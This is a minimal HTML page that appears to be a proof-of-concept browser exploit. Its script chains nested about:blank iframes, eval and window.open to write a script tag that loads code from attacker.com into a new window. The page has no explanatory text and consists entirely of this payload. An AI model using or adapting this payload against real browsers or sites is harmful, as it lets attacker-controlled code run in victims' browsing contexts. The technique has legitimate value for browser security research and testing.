<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGKjUbiGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGKjUbiGGGGG.onload=_=>GGGGGKjUbiGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGKjUbiGGGG src=about:blank><\/iframe><script>GGGGKjUbiGGGG.onload=_=>GGGGKjUbiGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGKjUbiGGGG.contentWindow.location.reload();<\/script>";GGGGGKjUbiGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>